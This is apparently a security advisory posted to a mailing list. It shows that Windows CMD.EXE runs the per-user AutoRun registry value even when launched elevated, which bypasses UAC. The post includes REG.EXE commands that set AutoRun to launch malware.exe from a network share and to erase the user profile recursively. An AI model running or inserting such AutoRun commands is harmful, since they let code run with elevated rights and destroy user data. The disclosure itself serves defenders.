Hi @ll, the help text displayed by the command line "%COMSPEC% /?" as well as the documentation of Windows' command processor CMD.EXE both state: | * Executing registry subkeys | | If you do not specify /d in String, Cmd.exe looks for the following | registry subkeys: | | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor\AutoRun\REG_SZ | | HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun\REG_EXPAND_SZ | | If one or both registry subkeys are present, they are executed before | all other variables. | | ^ | /!\ Warning | ¯¯¯ | Incorrectly editing the registry may severely damage your system. Especially this last remark is NOT correct, at least but incomplete: correctly editing the registry may severely damage your system too! Demonstration: ~~~~~~~~~~~~~~ 0. Log on to the "protected" administrator account created during the installation of Windows. 1. Run the following command line to add the AutoRun registry entry: REG.EXE ADD "HKEY_CURRENT_USER\Software\Microsoft\Command Processor" /V "AutoRun" /T REG_SZ /D "ECHO HKEY_CURRENT_USER" /F 2. Start the command processor C:\Windows\System32\cmd.exe per double- click or via command line %COMSPEC%: it prints the line | HKEY_CURRENT_USER 3. Start Windows^WFile Explorer, open the "System" directory, right- click on C:\Windows\System32\cmd.exe to display its context menu, then click on the "Run as administrator" entry and acknowledge the UAC prompt: again it prints the line | HKEY_CURRENT_USER OUCH: although running elevated now, the command processor eveluates a registry entry written by an unprivileged user, thereby bypassing the "wonderful" but completely futile security theatre known as user account control! JFTR: of course nobody uses the "protected" administrator account created during Windows setup for their everyday work, and also nobody will EVER start an elevated command prompt there?! Now just consider to run one of the following command lines and imagine what damage their execution may spark: REG.EXE ADD "HKEY_CURRENT_USER\Software\Microsoft\Command Processor" /V "AutoRun" /T REG_SZ "\\server\share\malware.exe" /F REG.EXE ADD "HKEY_CURRENT_USER\Software\Microsoft\Command Processor" /V "AutoRun" /T REG_SZ "ERASE /F /Q /S ""%USERPROFILE%""" /F stay tuned, and far away from "protected" accounts and split tokens! Stefan Kanthak PS: compare this misbehaviour of the command processor to that of COM, as documented in : | Beginning with Windows Vista® and Windows Server® 2008, if the integrity | level of a process is higher than Medium, the COM runtime ignores per- | user COM configuration and accesses only per-machine COM configuration. | This action reduces the surface area for elevation of privilege attacks, | preventing a process with standard user privileges from configuring a | COM object with arbitrary code and having this code called from an | elevated process.